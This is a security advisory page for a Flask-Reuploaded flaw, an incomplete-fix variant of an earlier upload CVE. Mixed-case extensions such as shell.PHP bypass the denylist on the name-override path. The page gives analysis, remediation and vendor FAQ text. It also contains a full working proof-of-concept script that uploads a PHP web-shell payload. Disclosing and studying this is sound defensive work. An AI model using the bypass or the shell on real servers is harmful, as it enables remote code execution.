Summary
Flask-Reuploaded: Extension-denylist bypass via case-folding asymmetry in name-override path (incomplete-fix variant of CVE-2026-27641)
1. Header
| Field | Value |
|---|---|
| Title | Extension-denylist bypass via case-folding asymmetry in name-override path (incomplete-fix variant of CVE-2026-27641) |
| Project | Flask-Reuploaded (flask_uploads) |
| Affected | <= 1.5.0 (latest release; commit ae31c3f91da40b465ca5e8f57d93f063b4553e23) |
| Relationship | Incomplete-fix variant of CVE-2026-27641 (fixed in v1.5.0; this variant survives that fix) |
| CWE | CWE-434 (Unrestricted Upload of File with Dangerous Type) + CWE-178 (Improper Handling of Case Sensitivity) |
| CVSS v3.1 (proposed) | ~7.0–7.3 (High, conditional), CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H. Final score deferred to maintainer. |
| Verified against | pip install Flask-Reuploaded==1.5.0, Python 3.11 |
2. Decisive evidence, the asymmetry
The v1.5.0 fix for CVE-2026-27641 added an extension re-validation that runs when a caller supplies a name override to UploadSet.save(). It is routed through the case-preserving extension() helper, whereas the default upload path normalizes to lowercase via lowercase_ext() (inside get_basename()). The two paths disagree on case:
default path : get_basename("shell.PHP")
= lowercase_ext(secure_filename("shell.PHP")) = "shell.php"
-> extension("shell.php") = "php"
-> extension_allowed("php") -> DENY (correct)
name-override : secure_filename("shell.PHP") = "shell.PHP" (case preserved)
-> basename = "shell.PHP"
-> ext = extension("shell.PHP") = "PHP" (NOT lowercased)
-> extension_allowed("PHP") -> ALLOW (bypass)
On a denylist UploadSet the allow-check returns True for the mixed-case form:
# extensions.py:97
def __contains__(self, item): return item not in self.items
# "PHP" not in ('js','php','pl','py','rb','sh') -> True -> allowed
extension_allowed("PHP") passes the denylist that extension_allowed("php") is blocked by.
3. Vulnerability summary
UploadSet.save(storage, name=...) lets the caller override the stored filename. After the CVE-2026-27641 fix, name is sanitized with secure_filename() and its extension re-validated. Because the re-validation compares a case-preserving extension against a policy whose denied tokens are lowercase, an attacker controlling name stores a file with a denied extension by varying case (shell.PHP, evil.pHp). On servers that resolve/execute extensions case-insensitively (Windows/macOS filesystems; Apache AddHandler/AddType), this re-enables the dangerous-upload → code-execution outcome the parent CVE addressed. The bypassed config is the one the library's own docs recommend for blocking scripts (see §6).
4. Affected components
Permalinks pinned to commit ae31c3f91da40b465ca5e8f57d93f063b4553e23 (v1.5.0).
| Role | Location |
|---|---|
| Normalizing helper (default path) | src/flask_uploads/flask_uploads.py:283, return lowercase_ext(secure_filename(filename)) |
save() entry |
src/flask_uploads/flask_uploads.py:285 |
| name-override sanitize | src/flask_uploads/flask_uploads.py:333, name = secure_filename(name) |
| name-override assign (case kept) | src/flask_uploads/flask_uploads.py:341, basename = name |
| Re-validation (non-normalizing) | src/flask_uploads/flask_uploads.py:344, ext = extension(basename) |
| Allow-check | src/flask_uploads/flask_uploads.py:345 |
| Policy check | src/flask_uploads/flask_uploads.py:268, extension_allowed |
| Containment backstop (path only) | src/flask_uploads/flask_uploads.py:364 |
| Sink | src/flask_uploads/flask_uploads.py:374, storage.save(target) |
| Case-preserving extractor | src/flask_uploads/extensions.py:101, def extension |
| Case-normalizing extractor | src/flask_uploads/extensions.py:109, def lowercase_ext |
| Denylist membership | src/flask_uploads/extensions.py:97, AllExcept.__contains__ |
| Documented script denylist | src/flask_uploads/extensions.py:34-35 |
5. Taint analysis
- Source: the
nameargument ofUploadSet.save(storage, name=...), commonly user-derived; the parent CVE-2026-27641 already treatsnameas attacker-controllable. - Guard (asymmetric):
secure_filename(name)stops traversal, but the extension policy check at:344-345uses non-normalizingextension()against a lowercase-tokened policy. The realpath containment at:364constrains the path, not the extension, orthogonal to this bypass. - Sink:
storage.save(target)at:374writes the attacker-extensioned file into the served upload directory.
6. CVSS justification (preconditions stated honestly)
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H ≈ 7.0–7.3 (High).
- AV:N, web upload endpoint.
- AC:H, three preconditions (stated plainly):
UploadSetuses a denylist,AllExcept(...)or populatedconfig.deny. (Allowlists fail closed, §7c.)- Application passes a user-influenced
nametosave(). - Deployment resolves/executes extensions case-insensitively (Windows/macOS FS; Apache
AddHandler/AddType).
- PR:L, uploads typically authenticated. UI:N. S:U. C:H/I:H/A:H, RCE under the web server's privileges on execution-capable upload dirs.
Why High, not a contrived misconfiguration, the bypassed control is the library's documented script-blocking mechanism:
extensions.py:34-35,SCRIPTS: "…you might want to addphpto the DENY setting."extensions.py:24-26,EXECUTABLES: "…it's better suited for use withAllExcept."
An app that followed this guidance to block scripts is exactly what this variant defeats.
Not claimed: not Critical. Pure allowlists are unaffected; execution requires a case-insensitive surface. Final score deferred to the maintainer.
7. Proof of Concept (results)
Against shipped Flask-Reuploaded==1.5.0:
7a. Asymmetry
default path : lowercase_ext("shell.PHP") -> "php" -> extension_allowed("php") -> DENY
name-override : secure_filename("shell.PHP") -> "shell.PHP" -> extension(...) -> "PHP" -> extension_allowed("PHP") -> ALLOW
7b. End-to-end (denylist AllExcept(SCRIPTS))
[1] save(storage("shell.PHP")) -> UploadNotAllowed (default path blocked)
[2] save(storage("upload.bin"), name="shell.PHP") -> saved "shell.PHP", on_disk=True (BYPASS)
[2b] save(storage("upload.bin"), name="evil.pHp") -> saved "evil.pHp", on_disk=True; containment intact
7c. Negative controls
[3] allowlist IMAGES, name="shell.PHP" -> UploadNotAllowed: File extension 'PHP' is not allowed (fail-closed)
[4] allowlist IMAGES, name="photo.jpg" -> saved "photo.jpg" (legit unaffected)
8. Patch pattern (internal precedent)
The project ships a case-normalizing extractor (lowercase_ext, used by get_basename) specifically so configured extensions are "compare[d] … in the same case" (its docstring). The v1.5.0 re-validation instead calls the case-preserving extension(), so the new guard does not match the normalization the rest of the system relies on, the classic incomplete-fix shape where a hand-rolled check diverges from the canonical normalizer.
9. Impact
- Bypass of the documented extension denylist for scripts/executables.
- Storage of
.PHP/.pHp/ mixed-case dangerous files inside the served upload directory (path containment holds; extension policy defeated). - On case-insensitive execution surfaces → remote code execution under the web server's privileges, the parent CVE's end impact, re-enabled on denylist deployments.
10. Suggested remediation
Normalize before the policy check so the name-override path matches the default path:
ext = extension(basename).lower()(orextension(lowercase_ext(basename))) beforeextension_allowed.- Or run the overridden
basenamethroughlowercase_ext()(asget_basenamedoes) before both validation and save. - Or make
extension_allowed/ the policy containers case-insensitive.
Option (1) or (2) is the minimal, behavior-preserving fix.
11. Evidence files
poc_case_fold.py(§12), self-contained PoC; runs againstpip install Flask-Reuploaded==1.5.0./tmp/flask_reuploaded_case_fold_proof.txt, captured verdict.- Source permalinks pinned to commit
ae31c3f91da40b465ca5e8f57d93f063b4553e23.
12. Full PoC script (poc_case_fold.py)
"""
PoC, Flask-Reuploaded CVE-2026-27641 incomplete-fix variant
Case-folding asymmetry in the name-override extension re-validation.
Parent fix (v1.5.0) added an extension re-validation in UploadSet.save() when a
`name` override is supplied, but routed it through the CASE-PRESERVING
`extension()` helper instead of the CASE-NORMALIZING `lowercase_ext()` used by the
default upload path (get_basename -> lowercase_ext). On a denylist-style UploadSet
(AllExcept / config.deny), an uppercase/mixed-case extension therefore bypasses the
denylist that the default path correctly blocks.
default path : lowercase_ext("shell.PHP") -> "php" -> extension_allowed("php") -> DENY
name-override : secure_filename("shell.PHP") -> "shell.PHP" (case kept)
-> extension("shell.PHP") -> "PHP" -> extension_allowed("PHP") -> ALLOW
Tested against the SHIPPED, patched Flask-Reuploaded==1.5.0.
"""
import io
import os
import shutil
import tempfile
from flask import Flask
from flask_uploads import (
UploadSet, AllExcept, SCRIPTS, IMAGES, configure_uploads, UploadNotAllowed,
)
from werkzeug.datastructures import FileStorage
import flask_uploads
def make_storage(filename: str) -> FileStorage:
return FileStorage(
stream=io.BytesIO(b"<?php system($_GET['c']); ?>"),
filename=filename,
content_type="application/octet-stream",
)
def run():
import importlib.metadata as md
print(f"[*] pip reports: Flask-Reuploaded=={md.version('Flask-Reuploaded')}")
dest_denylist = tempfile.mkdtemp(prefix="fr_deny_")
dest_allowlist = tempfile.mkdtemp(prefix="fr_allow_")
app = Flask(__name__)
files_deny = UploadSet("filesdeny", AllExcept(SCRIPTS)) # documented "allow all except scripts"
files_allow = UploadSet("filesallow", IMAGES) # allowlist (fail-closed)
app.config["UPLOADED_FILESDENY_DEST"] = dest_denylist
app.config["UPLOADED_FILESALLOW_DEST"] = dest_allowlist
configure_uploads(app, (files_deny, files_allow))
results = {}
with app.app_context():
# [1] default path, denylist -> must DENY
try:
saved = files_deny.save(make_storage("shell.PHP"))
results["default_path"] = f"SAVED as {saved} <-- UNEXPECTED"
except UploadNotAllowed:
results["default_path"] = "DENIED (expected)"
# [2] name-override, denylist -> BYPASS
try:
saved = files_deny.save(make_storage("upload.bin"), name="shell.PHP")
on_disk = os.path.join(dest_denylist, saved)
results["variant"] = f"BYPASS, saved as {saved}, on_disk={os.path.exists(on_disk)}"
except UploadNotAllowed:
results["variant"] = "DENIED (variant did NOT reproduce)"
# [2b] mixed-case generality + containment intact
try:
saved = files_deny.save(make_storage("upload.bin"), name="evil.pHp")
on_disk = os.path.join(dest_denylist, saved)
inside = os.path.realpath(on_disk).startswith(os.path.realpath(dest_denylist))
results["variant_mixed"] = f"BYPASS, saved as {saved}, inside_dest={inside}"
except UploadNotAllowed:
results["variant_mixed"] = "DENIED"
# [3] allowlist -> fail closed
try:
saved = files_allow.save(make_storage("real.jpg"), name="shell.PHP")
results["allowlist"] = f"SAVED as {saved} <-- allowlist leaked"
except UploadNotAllowed:
results["allowlist"] = "DENIED (expected, allowlist fails closed)"
# [4] legit upload -> allowed
try:
saved = files_allow.save(make_storage("real.jpg"), name="photo.jpg")
results["legit"] = f"SAVED as {saved} (expected)"
except UploadNotAllowed:
results["legit"] = "DENIED (UNEXPECTED, legit upload broke)"
print("VERDICT:")
for k, v in results.items():
print(f" {k:14s}: {v}")
confirmed = (
"BYPASS" in results.get("variant", "")
and results.get("default_path") == "DENIED (expected)"
and "DENIED" in results.get("allowlist", "")
)
print("FLASK_REUPLOADED_CASE_FOLD_CONFIRMED" if confirmed else "VARIANT NOT CONFIRMED, honest cut")
shutil.rmtree(dest_denylist, ignore_errors=True)
shutil.rmtree(dest_allowlist, ignore_errors=True)
if __name__ == "__main__":
run()
Impact
The application accepts file uploads without adequately restricting the file type or content. Typical impact: remote code execution if the uploaded file can be served and executed on the server.
CVE-2026-54567 has a CVSS score of 7.5 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.6.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-54567? CVE-2026-54567 is a high-severity unrestricted upload of dangerous file types vulnerability in Flask-Reuploaded (pip), affecting versions <= 1.5.0. It is fixed in 1.6.0. The application accepts file uploads without adequately restricting the file type or content.
- How severe is CVE-2026-54567? CVE-2026-54567 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of Flask-Reuploaded are affected by CVE-2026-54567? Flask-Reuploaded (pip) versions <= 1.5.0 is affected.
- Is there a fix for CVE-2026-54567? Yes. CVE-2026-54567 is fixed in 1.6.0. Upgrade to this version or later.
- Is CVE-2026-54567 exploitable, and should I be worried? Whether CVE-2026-54567 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-54567 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-54567? Upgrade
Flask-Reuploadedto 1.6.0 or later.